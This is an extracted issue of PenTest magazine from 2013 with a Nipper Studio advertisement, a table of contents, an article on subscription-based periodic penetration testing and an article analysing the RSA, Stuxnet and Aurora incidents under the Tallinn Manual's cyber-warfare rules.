PenTest 2013-5

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The key takeaways are that Nipper Studio is a software tool that enables detailed auditing of network device configurations without needing to manually review configuration files. It can automate audits of firewalls, routers, switches and other network infrastructure devices.

Nipper Studio is a software tool developed by Titania that enables penetration testers and security professionals to perform comprehensive audits of network device configurations. It examines the actual configurations of devices like firewalls, routers, and switches to identify vulnerabilities, rather than just scanning them like other tools. This allows it to identify issues that scanners cannot detect.

Some key features of Nipper Studio include its ability to automate audits against over 100 different network device types, generate customized audit reports, include device-specific mitigation actions in reports, and support for customizing audits based on an organization's specific policies and requirements.

Cyber Security Auditing Software

Improve your
Firewall Auditing
As a penetration tester you have to be an expert in multiple
technologies. Typically you are auditing systems installed and
maintained by experienced people, often protective of their own
methods and technologies. On any particular assessment testers may
have to perform an analysis of Windows systems, UNIX systems, web
applications, databases, wireless networking and a variety of network
protocols and firewall devices. Any security issues identified within
those technologies will then have to be explained in a way that both
management and system maintainers can understand.
he network scanning phase of a
penetration assessment will quickly
identify a number of security
weaknesses and services running on the
scanned systems. This enables a tester to
quickly focus on potentially vulnerable
systems and services using a variety of tools
that are designed to probe and examine
them in more detail e.g. web service query
tools. However this is only part of the picture
and a more thorough analysis of most
systems will involve having administrative
access in order to examine in detail how
they have been configured. In the case of
firewalls, switches, routers and other
infrastructure devices this could mean
manually reviewing the configuration files
saved from a wide variety of devices.
Although various tools exist that can
examine some elements of a configuration,
the assessment would typically end up
being a largely manual process. Nipper
Studio is a tool that enables penetration
testers, and non-security professionals, to
quickly perform a detailed analysis of
network infrastructure devices. Nipper
Studio does this by examining the actual
configuration of the device, enabling a much
more comprehensive and precise audit than
a scanner could ever achieve.

With Nipper Studio penetration testers can be experts in

every device that the software supports, giving them the
ability to identify device, version and configuration
specific issues without having to manually reference
multiple sources of information. With support for around
100 firewalls, routers, switches and other infrastructure
devices, you can speed up the audit process without
compromising the detail.

You can customize the audit policy for your customers

specific requirements (e.g. password policy), audit the
device to that policy and then create the report detailing
the issues identified. The reports can include device
specific mitigation actions and be customized with your
own companies styling. Each report can then be saved
in a variety of formats for management of the issues.
Why not see for yourself, evaluate for
free at

Ian has been working with leading global

organizations and government agencies to
help improve computer security for more
than a decade.
He has been accredited by CESG for his security and
team leading expertise for over 5 years. In 2009 Ian
Whiting founded Titania with the aim of producing
security auditing software products that can be used by
non-security specialists and provide the detailed
analysis that traditionally only an experienced
penetration tester could achieve. Today Titanias
products are used in over 40 countries by government
telecommunications companies, national infrastructure
organizations and auditing companies, to help them
secure critical systems.

Dear Readers,
e have a pleasure to present you the newest isW
sue of PenTest Regular. The Pentesters Development Kit will allow you to take your penetration
testing skills to the next level. This month, you will encounter ten articles which will give you a wide scope
of techinques and tools and will definitely help you in
your career.

Editor in Chief: Ewa Duranc

[email protected]
Managing Editor:
Zbigniew Fiona
[email protected]
Jakub Walczak
[email protected]
Editorial Advisory Board: Jeff Weaver, Rebecca Wynn
Betatesters & Proofreaders: Ayo Tayo Balogun, Aidan Carty,
Gregory Chrysanthou, Amit Chugh, Dan Dieterle, Pilo Dx, Pinto
Elia, Mardian Gunawan, Steve Hodge, David Jardin, Laney
Kehel, Gilles Lami, L. Motz, Phil Patrick, Sagar Rahalkar, Iaki
Rodriguez, Tim Singletary, Jeff Smith, Steven Wierckx
Special Thanks to the Beta testers and Proofreaders who
helped us with this issue. Without their assistance there would
not be a PenTest magazine.
Senior Consultant/Publisher: Pawel Marciniak
CEO: Ewa Dudzic
[email protected]
Production Director: Andrzej Kuca
[email protected]
DTP: Ireneusz Pogroszewski
Art Director: Ireneusz Pogroszewski
[email protected]
Publisher: Hakin9 Media Sp. z o.o. SK
02-682 Warszawa, ul. Bokserska 1
Phone: 1 917 338 3631
Whilst every effort has been made to ensure the high quality of
the magazine, the editors make no warranty, express or implied,
concerning the results of content usage.

First, Lets Talk About Security: Rob Muris and

Trajce Dimkov will present you their concept of Hacking as a Service and Lance Cleghorn will give you
several real life situations, in which knowledge of the
Tallinn Manual comes in handy.
In the Techniques section you will be able to read
what Noman Mohammed and Benjamin C. M. Fung
have to say about Privacy-Preserving Data Publishing. After that, Fadli B. Sidek will instruct you on
avoiding anti-virus and anti-spyware detection. Next,
you will find Phantoms Cerebrum: Using Python to
Work a Botnet by Milind Bhargava. And closing this
section, Mohsen Mostafa Jokar will explain how to
create a cryptographic key with the GnuPG standard.
The Tools section will be opened by Christopher
Ashby explaining to you Automating Malware Analysis with Cuckoo. The next tool will be an interesting
alternative to nmap unicorn explored by Aleksandar
Bratic. Finally, the issue will be closed by Jason Nehrboss guiding you through entering a Cisco router
with SNMP and Midnitesnake sharing his knowledge
of The USB Rubberducky The Pentesters USB.
We hope that our authors hard work will allow you
to improve your skills, what will result in your work being not so hard. As always, we did our best to bring
you the top quality content. Enjoy your reading!
Jakub Walczak & the PenTest team

All trade marks presented in the magazine were used only for
informative purposes.
All rights to trade marks presented in the magazine are
reserved by the companies which own them.


The techniques described in our articles may only

be used in private, local networks. The editors
hold no responsibility for misuse of the presented
techniques or consequent data loss.

05/2013 (24) August




06Hacking as a Service

By Rob Muris and Trajce Dimkov

By Mohsen Mostafa Jokar

To gain insight into their security vulnerabilities, companies

perform penetration tests on their websites and infrastructure.
Mostly, the tests are performed ad hoc or maybe on a yearly
basis. This is not sufficient due to the continuous change of
the IT landscape and the new vulnerabilities discoveries. The
question that rises is: how can companies keep their security
exposure visible despite these changes? In this article, we focus on one possible answer to this: hacking as a service.


Interpreting the Tallinn Manual Using

Real World Examples
By Lance Cleghorn

The Tallinn Manual on the International Law Applicable to Cyber

Warfare was published in 2013 and is the result of three years of
research by twenty of the worlds top legal and technical scholars. The Tallinn Manual is an effort of the NATO Cooperative
Cyber Defense Centre of Excellence that began in 2009. The
primary goal of this effort is to create a manual of the highest
professional integrity, which could be referenced in the event that
the subject matter was to ever reach the international spotlight.



Privacy-Preserving Data Publishing

By Noman Mohammed and Benjamin C. M. Fung

Privacy-preserving data publishing is an exciting research area. This article presents different technical proposals to the
demand of simultaneous information sharing and privacy protection. However, the problems of data privacy cannot be fully
solved only by technology. We believe that there is an urgent
need to bridge the gap between advanced privacy preservation technology and current policies.

Evasion: Bypassing AV Products

and Protection Against It
By Fadli B. Sidek

AV evading techniques are getting better and smarter by the

day, and having just an Anti-Virus and Anti-Spyware application is insufficient to protect our machines from additional angles of threats.


Phantoms Cerebrum: Using Python

to Work a Botnet
By Milind Bhargava

Imagine a ghost robot in every computer, working in the shadows; lets call it the Phantom, performing tasks for its master.
The master controls the ghosts through a master brain device; lets call it the cerebrum, much like the device Prof Xavier had in the X-Men. That device could control the minds of
mutants all over the world. In this case, the cerebrum controls
the phantoms in each computer of my home and workplace.

05/2013 (24) August

36Cryptography with GPG


Cryptography is used to decode an important message. The

receiver takes a ciphered message and uses a key for converting it to a comprehensible one. There are many reasons to
perform cryptography: a messenger may be captured by the
enemy or even deliver the message to the wrong person. If
the message was in plaintext or cleartext, anybody could read
and understand it.


Malware Analysis with

By Christopher Ashby

This article will outline implementing an automated virtual environment to aid in the identification and analysis of potentially
malicious software, what can then be extended to proactively
detect and ultimately protect corporate environments from being infected.

Magic Help in
By Aleksandar Bratic

The first and critical phase of testing is reconnaissance where

we usually rely on nmap, which is the most famous, and the
best tool (or one of the best ones). Recently, I have started to
use unicorn to complete my reconnaissance phase and I have
found several very useful options of this tool. These options
will be explained in this article.


Hacking Cisco Routers with SNMP


The USB Rubber Ducky

The Pentesters USB

By Jason Nehrboss

Cisco routers have a number of remote access and management services available. One of the most used and least insecure is SNMP. The article shows some of the common techniques and demonstrates a new tool for taking over routers
that are vulnerable. Virtually all networking devices support
SNMP, and most network monitoring and management software uses it.

By Midnitesnake

The USB Rubber Ducky or Ducky, for short, is a programmable Human Interface Device (HID), that, when inserted into an
Operating System (OS), will interact or assume the identity of
a certain device: keyboard, mass storage, or a given combination, allowing the injection of keystrokes or applications into
the OSs memory. The key focus on the Ducky is that it can be
programmed in a simple high-level language that any user of
any technical skill level can quickly and easily learn to program.


Hacking as a Service
To gain insight into their security vulnerabilities, companies
perform penetration tests on their websites and infrastructure.
Mostly, the tests are performed ad hoc or maybe on a yearly
basis. This is not sufficient due to the continuous change of the IT
landscape and the new vulnerabilities discoveries. The question
that rises is: How can companies keep their security exposure
visible despite these changes? In this article, we focus on one
possible answer to this: Hacking as a Service.

ttacks on websites and online applications

take place every day and precious business
information is leaking away. An organization
can understand the exposure from such attacks by
executing penetration tests.
Penetration tests are done usually ad hoc. There
are three reasons why ad hoc testing is not sufficient.
First, hackers constantly find and use newly discovered vulnerabilities. Second, organizations constantly move through new initiatives (BYOD, The Cloud
etc.) and changes on the existing infrastructure and
applications (updates/upgrade or adjustments to
configuration etc.), what often leads to bringing new
systems or services online. Third, periodic penetration tests are widely accepted as security best practice and are required by many regulatory standards,
including the PCI Data Security Standard, but also local laws like the Dutch privacy act. To keep the expoIn 2011 the Sony PlayStation Network (PSN) got
hacked. Millions of user accounts were affected, the
PSN had to be taken down and payment card details
were stolen. A few months later, Sonys CIO stated that
the attack on the PSN was based on a known vulnerability.
This is one example that shows how important it
is to have an up-to-date insight in existing vulnerabilities and to act on, before someone else abuses them.

05/2013 (24) August

sure of the organization visible, up-to-date, and compliant with regulations, periodic penetration testing is
needed. Hacking as a Service(HaaS), is a service in
which a third party periodically tests the online environment for security issues, compares the difference
in the results from previous tests and gives the client
an up-to-date insight in its exposure.
In this article we describe some key elements of
Hacking as a Service, how it works and the dynamic way of vulnerability reporting.

What is Hacking as a Service?

With HaaS client takes a subscription to hacking.

Instead of executing penetration tests ad hoc, client gets periodic penetration testing and gets upto-date insight in their security information. The
key elements of this service are:

Testing on periodic basis

The infrastructure and applications are tested for

vulnerabilities on a periodic basis. Thus, client is
not dependent on the results of a one-time test but
on a range of tests executed over time.

Discovery of trends via testing results

Accumulated test results from a long period of time

provide an insight into trends for a specific system
or the whole infrastructure. These trends can be

Page 6

used to give an overview to senior management

on how much the external exposure has changed
over time. Senior management can use such analysis to define budgeting and expected amount of
improvement for the coming year.

Faster insight in the presence of new


Having frequent penetration tests enables company

to have a clear up-to date overview of the current
vulnerabilities on their infrastructure and externally
facing applications. When new software vulnerability emerges it is required to reduce its impact. Having a clear overview of the used software version
enables targeted penetration tests that can be executed in order to directly test whether a new vulnerability is applicable to the systems of the company
and whether the existing security controls are sufficient to reduce or compensate the impact.

Ensuring that the security controls do not

degrade over time

With change, security controls get more relaxed and

in some cases disabled. Periodic penetration testing helps to identify the change of the security controls over time. HaaS enables management to check
whether vulnerabilities found in previous penetration tests were remedied, and whether the newly deployed controls are sufficient to mitigate the risk. The
requirement for offering a service like HaaS. Offering
a service like HaaS requires the setup and development of a number of components, such as:

Penetration testing environment;

Automated tools;
Standardized output files;
Test scripts.

gies. Therefore, the service provider needs to have

a structured way to implement these new tools and
methodologies in the penetration testing environment and keep in mind that previous results need
to be comparable with new testing results.
Automating tools is not enough. Almost every tool
reports false positives that need to be filtered out.
Also, tools cannot find all the vulnerabilities. Therefore, the service provider needs to perform additional manual testing. Since every pentester has his
own way of testing, the service provider needs to
find a way to perform the additional manual testing
in a consistent and secure way. A way to do this is
to make use of test scripts. Using a test script allows
the service provider to document what a pentester can do, how can he execute the tasks, how the
results are documented, and what preventive measurements for issues and outages should be taken.
If the service provider does not perform the additional manual testing in a consistent way, he cannot
compare the results from multiple tests.
Automation of tools and creation of standard output files can be used for reporting. These output
files are used to import the results into a report or a
security dashboard used for reporting. These can
then provide granular and historical information on
the existing systems and their vulnerabilities.
Setting up the above components can be challenging and costly (for example, the automation
of tools, writing the test scripts, installing and configuring the penetration testing environment, and
standardized update of the tools), but it will enable
every tester to use the same approach and the
same tools. As a result, the penetration tests will
Overview latest security tests

Organization that offers the service (service provider) needs a highly secured penetration testing environment which includes the preferred penetration
testing tools, such as Nmap, Dirbuster, Nexpose,
Wireshark and Nessus. The penetration testing
environment should be used to automate as many tasks as possible to consistently use the tools
to detect hosts, perform port scans and vulnerability scanning on infrastructure and application. This
allows comparison of results between the tests and
enables the client to determine the progress made
in remedying the identified risks. The penetration
testing environment may change also because of
the changes of the threat landscape or the release
of new penetration testing tools and methodolo05/2013 (24) August



Security test 1

Security test 2

Security test 3

Security test 4

Open and closed vulnerabilities



Figure 1. Number of charts showing the risk exposure of the

organization over time

Page 7


be executed in a consistent, accurate, and efficient
way and will enable presenting the results in structured and consistent manner.

The dynamic way of vulnerability


The main goal of vulnerability reporting is to make

client aware of the vulnerabilities. By using the
HaaS approach, organizations can stop using the
static penetration test reports and transit to a solution that facilitates the dynamic and clear way of reporting. For instance, a security dashboard, like the
one presented in Figure 1, could support the organization in getting actual insight on its risk exposure.
The security dashboard could then be used as a
graphical management summary for all tests that
have been performed. It contains informational
charts about the latest test and gives insight into
multiple tests as well. The dashboard should also contain the technical details for the IT department. Combining this information in one centralized place, makes it possible for the management
and the IT to discuss the same problems. Figure
2 contains information that normally should be in
a penetration test report. The advantage of using
a dynamic form of reporting is the possibility to filter on, for example, the highest risks. In short: a
security dashboard could support organizations in
getting actual insight into their online security level.

Getting into action with vulnerability


Aside from vulnerability reporting, it is also important to get vulnerabilities addressed. However, the
remediation should be done by a separate party,
so that independence of the penetration testers
can be maintained. Consider this scenario: The
service provider performed a penetration test and
delivered to the client the report with detailed information about the observations. After a certain time,
the service provider performed the same penetration test with the same scope again and the same
vulnerabilities showed up.
Frequently, client reads the report but no further
actions are taken. The report is then put in an archive, sometimes some of the vulnerabilities are
fixed and the other ones get forgotten over time.
The main reason why vulnerabilities are not addressed properly, is because nobody has taken
the responsibility for fixing them or the follow-up
actions are not tracked. That is the reason why
vulnerability tracking is needed. The vulnerability
tracking module has some critical success factors:

The possibility to assign responsibility

If nobody is responsible, nobody will act. Therefore, all the new vulnerabilities should be assigned
to a specific person responsible for remedying the

Figure 2. Detailed observation description for IT

Figure 3. Vulnerability tracking

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Page 8

The possibility to assign priorities

simulates an attack by a malicious attacker on

the infrastructure and website, and an attack by a
malicious attacker who already got access to the
online applications in the organization.

It is important to assign a priority to each of the vulnerabilities. The priority will inform the assignee in
which sequence the vulnerabilities need to be fixed.

The possibility to monitor the progress

For all vulnerabilities, the manager must be able to

determine the current state. Based on the state the
client can determine if extra actions are needed.
With vulnerability tracking between penetration
tests the organization can manage the process of
fixing vulnerabilities from one central place. This
can be done through a security dashboard, where
a manager can monitor in the real time all the follow-up actions for the vulnerabilities of the performed penetration tests. When a new vulnerability
is found, the client can address those vulnerabilities
and make someone responsible for fixing the vulnerability. Afterwards, the client can track the efforts
made by the assignee to fix the vulnerability. Therefore, vulnerability tracking helps the client increase
the vulnerability fixing capabilities (see Figure 3).

Different client, different needs

Every client is different and has specific needs

what is reflected in the scope of the penetration
tests. In case of HaaS, these needs can be localized in different testing levels, such as infrastructure, web application, and advanced web application. Here are the levels examples:
The infrastructure level is the starting level,
where the company gets a periodic penetration
testing of Internet-facing infrastructure components and the presence of new systems.
The second level is web application (which includes the infrastructure level), providing more indepth tests of the website, such as SQL injection
and Cross-Site Scripting (XSS). With this test,
the organization simulates an attack by a malicious attacker on the infrastructure and website.
The third level is advanced web application, including thorough penetration testing of web applications, specifically on privilege escalation (the
unauthorized access to information or functions
as a normal user). With this test the organization

The advantage of HaaS is that the tests can be

performed daily, monthly, quarterly or every six
months, for each of the testing levels. Since the
infrastructure of penetration testing is set for a periodic testing, the organization can have additional
testing when needed (for example after performing any changes) with a minimal overhead.


In the past, multiple companies were hacked via

known vulnerabilities. Some of the hacks could
have been prevented if the companies had been
aware of their online risk exposure and if the actions
had been taken to remedy these vulnerabilities.
Getting insight into clients current vulnerability
level can be achieved by performing a penetration
test. Penetration test is a snapshot of the security
exposure of the organization, but it does not provide up-to-date information in a consistent manner.
HaaS is a new service in penetration testing that attempts to cover this deficiency of traditional penetration tests. With HaaS, client gets periodic, consistent
overview of his security posture. Such overviews enables the client to identify emerging risks and follow
the mitigation of the previously identified risks.

Rob Muris

Trajce Dimkov

Figure 4. Prioritization of remediation activities

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Rob Muris is a security consultant in

the Security & Privacy Team of Deloitte Netherlands. He is involved in
the development of Hacking as a Service and performs penetration testing
assignments for various clients.

Page 9

Trajce Dimkov has obtained a PhD in Information Security with focus on physical penetration and social engineering
methodologies. With over 6 years of experience, Trajce is a part of the Security
& Privacy Team of Deloitte Netherlands,
where he is involved in a number of penetration testing assignments.


Interpreting the

Tallinn Manual Using

Real World Examples
The Tallinn Manual on the International Law Applicable to Cyber
Warfare was published in 2013 and is the result of three years of
research by twenty of the worlds top legal and technical scholars
[12]. The Tallinn Manual is an effort of the NATO Cooperative Cyber
Defense Centre of Excellence that began in 2009 [12].

he primary goal of this effort is to create a

manual of the highest professional integrity, which could be referenced in the event
that the subject matter were to ever reach the international spotlight [12]. The authors of the Tallinn
Manual had to consider every scenario relating to
cyber warfare and attempt to predict how the cyber
battlefield may change in years to come.
The Tallinn manual categorizes the appropriate
responses to a certain level of engagement of cyber operations crossing international boarders or
sponsored by a nation. The manual is organized
into 95 rules that serve to determine if an incident
meets the standards for aggression and define the
appropriate response [12]. The 300-page document is strongly backed by international precedence and treaty laws respected by NATO member
nations [12]. The authors aimed for a high degree
of specificity to avoid pitfalls that could stem from
While there is no treaty that requires nations to
respect the Tallinn Manuals guidelines, if an incident were to occur, the manual could be used
as justification for retaliation. The Tallinn Manual
could also be used to condemn a nation for mishandling a situation. The authors had to evalu05/2013 (24) August

ate the implications of their work and try to come

up with a neutral set of suggestions that the international community could agree on. To aid in
the understanding of this endeavor, it is best to
analyze it through the evaluation of real-world
scenarios where documented advanced persistent threats may eventually be linked to the efforts of a nation state. While the Tallinn Manual
specifically states that as of its publication, no
prior attack has met the criteria of a cyber-attack
that would trigger an armed conflict status, this
article will see how close some advanced persistent threats have come to this classification
and what hypotheticals could have escalated the
events [12].
The category of a cyber-incident is important to
be determined prior to taking any action. The use
of force, or the ability to respond with kinetic warfare, is reserved for scenarios where an armed
conflict is apparent [12]. The authors of the Tallinn Manual concluded unanimously that a cyberattack could constitute the initiation of an armed
conflict as long as the perpetrators were statesponsored and the resultant damage was consistent with a comparable physical assault (Rule 13
Section 14 and 3-6) [12]. The armed conflict sta-

Page 10

tus is of importance because it triggers a nations

inherent right to self-defense (Rule 15) [12].

Advanced Persistent Threats

In recent years a subtle trend of cyber-attacks

began to emerge that were categorized as advanced persistent threats [5]. To be classified as
an advanced persistent threat, an attack has to
meet a majority of the criteria determined by the
security community to constitute such an attack
[9]. While there are conflicting definitions of what
criteria are included in an advanced persistent
threat, many experts agree that the threat agent
must possess limitless resources and be able to
spend an excessive amount of time exploiting a
target [5, 9]. Another element that is alarmingly
common in advanced persistent threats is the
ability of the threat agent to incorporate zero-day
exploits into the attack [8].
A zero-day exploit is one that has never been
seen before it is executed. These types of exploits
are difficult to uncover and often require the skills
of seasoned researchers. In the case of some advanced persistent threats, the malware used may
contain several zero-day exploits [8]. The ability of
a threat agent to incorporate zero-day exploits into
an attack can be a key indicator of an advanced
persistent threat [9].

Case Study One:

RSA and Lockheed Martin

In 2011 Lockheed Martin and several other major United States defense contractors reported attempted security breaches identified as part of an
attack relating to the same advanced persistent
threat [14]. The threat agent utilized a zero-day
weakness in the RSA SecurID token to attempt
to infiltrate the networks of the defense contractor
victims [10]. While the attack on the defense contractors was largely unsuccessful in exfiltrating
proprietary and sensitive data, it was later confirmed that the most alarming compromise had already taken place [1]. The zero-day weakness in
RSAs SecurID token was later confirmed by RSA
to have been traceable to a previous attack where
RSA had proprietary seed values for the technology stolen [1].
The breach at RSA was a multiphase compromise that began with careful research by the threat
agent for a sustained period of time [10]. After a
series of vulnerable employees were identified by
the threat agent, a spear phishing e-mail was distributed containing a malicious Excel spreadsheet.
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When opened, the Excel spreadsheet launched a

zero-day exploit and compromised the local machine it was run on [10]. From this point the attackers were able to actively infiltrate the network
and hop from host node to node gaining elevated
user credentials. Finally, the attackers gained access to and exfiltrated data from a file server containing proprietary information on the design of the
SecurID tokens [1].
Before the Taillinn Manual can be used to determine an appropriate response to a threat, it must
first be confirmed that the event constitutes an actual cyber-attack as defined by the criteria in Rule
30. Rule 30 requires that an event exceed de minimis standards, meaning that it cannot involve
simple damage to availability, unless that damage
can be linked to the harm or suffering of civilian
populations [12]. Because the RSA breach itself
did not involve the loss of equipment or human
life as would be the case with an equivalent kinetic attack, it does not exceed de minimis and
does not constitute a cyber-attack as defined by
the Tallinn Manual.
The subsequent compromise of Lockheed Martin and other defense contractors was prevented
during their occurrence; however, had any compromise resulted in damage to equipment or loss
of human life they could have easily met the definition of a cyber-attack [12, 14]. Assuming the incursion was successful and Lockheed Martin infrastructure was irreparably damaged, the attack
would need to be classified to determine appropriate response. Rule 38, which categorizes civilian
equipment leveraged by military assets, would effectively make Lockheed Martin infrastructure a
viable target and could be used to initiate a state
of armed conflict [12]. Armed conflict would only
be classifiable if the threat agent could be linked
to another government either directly or through
the use of complicit agents [12].
If a state of armed conflict were initiated in this
scenario, the United States would be able to exercise its inherent right to self-defense [12]. Selfdefense gives the nation the ability to justifiably
retaliate with kinetic warfare operations [12]. This
particular attack against Lockheed Martin (had
it caused loss of property or equipment) would
have fallen under Rule 66 as cyber espionage
because the threat agent masqueraded as legitimate personnel in order to commit the attack [12].
Any agent that participated in the attack could be
caught and tried as a spy so long as he had failed
to be repatriated to the enemy nations forces [12].

Page 11


In the event that the agent returned to his forces of origin and was subsequently captured, the
agent would be afforded the rights of a prisoner
of war [12].
It is also pertinent to consider that, had the attack against Lockheed been successful and resulted in the loss of life of civilian personnel, the
event would not only initiate an armed conflict but
also broach the subject of war crimes [12]. Despite
the fact that some Lockheed Martin personnel contribute to national defense and military operations,
it is impossible to clearly discern whether or not
they are civilians. In the case where an attacking
nation cannot identify the status of a person, they
must default to assuming the person is a civilian
according to Rule 33 [12]. The authors of the Tallinn Manual were divided on who is allowed to determine a persons status in an armed conflict [12].
Whether the defending nation or attacking nation
defined the deterministic criteria, both options allowed for abuse.

Case Study Two:

Stuxnet Iranian Intrusion

The Stuxnet worm was an isolated sophisticated

family of malware that targeted a very specific type
of computer [6]. The malware was reported by the
Iranian Government in 2010. The Stuxnet worm
could almost be considered the Swiss Army knife
of advanced persistent threats. In total the worm
contained an unprecedented four zero-day exploits and spread using two of them to move from
host to host [6]. Once Stuxnet had successfully
compromised a host, it would copy itself onto any
removable flash media available, and this would
complete the infiltration phase of the advanced
persistent threat.
The worm would lie dormant in the flash media until it detected being plugged into a new
host. Once attached to a new host the malware
would infect the host and attempt to determine
if the host was tethered to a centrifuge used for
cooling and maintaining a nuclear power plant
[6]. If the worm detected that it was tethered to
such a device, it would execute its primary payload, which attempted to overload the centrifuge
and cause it to malfunction. In laboratory tests it
was later determined that the Stuxnet worm could
have caused the centrifuge to explode if certain
conditions were met [6]. Fortunately there was
no loss of life resulting directly from the Stuxnet
worm; however, there was considerable damage
to Irans nuclear infrastructure [2]. The sophisti05/2013 (24) August

cated nature of the worm itself coupled with the

specificity of the target (Iranian nuclear power facilities) make Stuxnet one of the most prolific advanced persistent threats to date.
Stuxnet is used by the authors of the Tallinn
Manual to describe the importance of the ability to define nation-sponsored actors prior to escalating to an armed conflict [12]. The actions of
civilians or terrorists, even when they occur in
other nations, cannot be considered as evidence
for armed conflict unless they are directed by
the government [12]. While this concession may
open up the manual for abuse, the authors consider it superior to the alternative of having civilians harmed or initiating armed conflict without legitimate provocation.
Stuxnet is specifically mentioned three times in
the Tallinn Manual and is a noted point of contention amongst the authors [12]. Some authors
felt that because the machines sustained significant logical damage and could have potentially
sustained physical damage, the operations constituted an armed conflict [12]. If Iran were able
to clearly identify a nation sponsored actor as the
perpetrator they could potentially make a case
for an armed conflict and exercise self-defense
procedures. Again, considering that the damage could have caused explosions or power outages and resulted in deaths of civilians, Rule 38
could not be used to justify the attack on strategic
equipment [12]. Rule 32, which condemns attacks
harming civilians, would supersede the effects
of Rule 38 even during a mutual armed conflict
[12]. Rule 80, which specifically identifies nuclear
power generation as an area that may only be attacked with restraint, would also be of interest in
the event the Stuxnet worm was ever evaluated
by NATO [12]. Stuxnet clearly failed to meet standards of restraint and also violates Rule 80 if it
were perpetrated by a nation actor.

Case Study Three: Aurora Malware

In 2010 a group of high profile business entities

lead by Google came forward to announce they
had been the victims of a new type of advanced
persistent threat known as Operation Aurora [7].
Originally discovered by McAfee Labs, Operation Aurora used a new type of zero-day stealth
malware that was able to remain undetected for
months, perhaps even longer [7]. The Aurora malware family spread over an extended period of
time through infected webservers and infiltrated a large number of victims from areas includ-

Page 12

ing financial, government, and infrastructure [7].

While the group lead by Google consisted of several major organizations, research into Operation
Aurora suggests that many other organizations
could have been infected and chose not to come
forward [7, 9].
It may be impossible to determine what, and how
much information was exfiltrated by the Aurora
malware family before its discovery. The sophistication of the malware and its ability to remain undetected for such a long period of time suggests
a level of professional planning that could most
likely only be accomplished with the resources of
a nation. While many advanced persistent threats
prefer to target a very specific victim, Aurora
spread much like a normal malware family and
still remained undetected. The increased activity
around high-profile targets also suggests that the
malware operators continued to actively manage
the infection and participated in data exfiltration.
Operation Aurora is the largest advanced persistent threat categorized to date and rivals Stuxnet
in sophistication [9].
Operation Aurora is widely considered to have
been designed and operated by groups under the
direction of Chinas Peoples Liberation Army [11].
Evidence discovered by researchers linked several computers used in the malware development
and control to schools and centers maintained by
the Peoples Liberation Army [11]. Despite circumstantial evidence suggesting that the Chinese military was involved in the attack, there remains no
direct evidence that the perpetrators acted with
the militarys knowledge or under their direction,
meaning that Rule 7 (an attack originating from
government infrastructure is insufficient evidence
to prove involvement) applies and China cannot be
held responsible. Assuming that proof were to surface that implicated the Chinese military in the attack, the Tallinn Manual may be used to direct the
United States response.
The targets of Operation Aurora were primarily
private corporations based in the United States.
While the malware was found on government computer nodes, the United States government did not
come forward with Google to disclose the compromise [7]. These private technological companies
affected by Aurora malware (Google, Adobe, Juniper) are limited in their recourse as they do not
provide essential services to civilians and no one
was actually harmed by the intrusion. Operation
Aurora fails to meet the de minimis standard that
would constitute an attack as defined in Rule 30
05/2013 (24) August

[12]. Considering that the malware was aimed to

damage and degrade civilian infrastructure Rule
37 would apply which prohibits the attack intentional or otherwise on any civilian target that is of
no military strategic value [12]. Rule 37 would only
be applicable if linked to an active armed conflict
and would not be sufficient to initiate armed conflict
in and of itself [12].


The Tallinn Manual is a legitimately complex legal

document that marks a major change in how war
is conducted by recognizing the cyber battlefield
as being equal to the physical warfront. Considering that the document is on its first published version with no current amendments, the progress
made is substantial. Clearly the international community has come to recognize that advanced persistent threats are beginning to encroach upon the
rights of member nations, and the fact that nation
states are taking an active role as threat agents
makes the Tallinn Manual necessary. Having a set
of guidelines is essential in deciding appropriate
responses to cyber-attacks, preventing harm to civilians, and misconduct.
Consensus was a clear pitfall of the document,
and it is concerning that a panel of twenty experts
could not come to an agreement on many of the
rules. It would be difficult to expect that the rules
of the Tallinn Manual could be internationally respected when many of them were points of contention for the authors. Considering the subject matter and the shear breadth of the document, some
disagreement is to be expected; however, it was
disappointing that so many of the rules were contended by some portion of the authors. The fact
that some authors felt that the Stuxnet operations
justified an armed response while the group had
agreed unanimously on criteria for self-defense
suggests that interpretation will play a large role in
the documents future.
The specificity used in the Tallinn Manual is the
crux of the document. Without specificity the rules
would be riddled with exceptions and be effectively unenforceable; however, there is a delicate
balance that needs to be maintained to avoid becoming too specific. Some interpretation will be
needed for the document to truly be applicable in
the coming years, but if the Tallinn Manual is too
specific then response may be overly ridged. Obviously the manual cannot address every scenario,
and attempting to do so would damage the integrity of the document. The links between the rules

Page 13



[1] Coviello, A. W. (2011, June 06). Open Letter to RSA Customers. Retrieved October 22, 2012, from RSA: http://www.
[2] FireEye Inc. (2012). Cyber Attacks on Government. Milpitas: FireEye Inc.
[3] Gorman, S., & Tibken, S. (2011, June 07). Security Tokens Take Hit. Retrieved October 20, 2012, from Wall Street
[4] Hazlewood, V. (2006). Defense-In-Depth: An Information Assurance Strategy for the Enterprise. La Jolla: San Diego
Supercomputer Center.
[5] Imperva. (2011). Hacker Intelligence Summary Report. Redwood Shores: Imperva.
[6] Kushner, D. (2013). The Real Story of Stuxnet. IEEE Spectrum, 48-53.
[7] Maiffert, M., & Lentz, R. (2011). How Operation Aurora, Trojans, bots, and other targeted attacks are overrunning
todays network defenses. Milpitas: FireEye and Modern Walware Exposed.
[8] Masood, R., Um-e-Ghazia, U., & Anwar, Z. (2011). SWAM: Stuxnet Worm Analysis in Metasploit. Frontiers of Information Technology, 142-147.
[9] Miller, R. (2012, July 1). Advanced Persistent Threats: Defending From The Inside Out. Targeted Attacks, pp. 1-16.
[10] Rashid, F. Y. (2011, June 07). RSA Will Replace SecurID Tokens in Response to Lockheed Martin Attack. Retrieved
October 22, 2012, from eWeek:
[11] Sanger, D. E., Barboza, D., & Perlroth, N. (2013, February 19). Chinese Army Unit Is Seen as Tied to Hacking Against
U.S. The New York Times, p. A1. Retrieved from The New York Times.
[12] Schmitt, M. N., et al. (2013). The Tallinn Manual. Cambridge: Cambridge University Press.
[13] Stallings, W., & Brown, L. (2012). Computer Security Principals and Practice. Upper Saddle River: Prentice Hall.
[14] Woodburn, D. (2011, June 13). Lockheed hack scares away RSA partners. Computer Reseller News, p. 1.

already create a scenario where interpretation is complicated.

The criteria for some
rules, when met,
make other rules applicable and in need
of evaluation. If an incident is complicated
enough, it may require several experts to chart out the manuals applicable rules and evaluate
Future precedence involving the
Tallinn Manual and time will benefit the document. The fact that the
authors agreed on the need for
amendments and revision bodes
well for the endeavor. Technology experts recognize that the
field is continually evolving,
and that attempting to create
hard and fast rules around
a subject matter that has
the potential to change is

05/2013 (24) August

impractical [13]. Striving towards a more concise

document and retaining a level of interpretability
while being specific enough to avoid acts going
unpunished is difficult. Treating the Tallinn Manual
as a living document that needs to be updated is
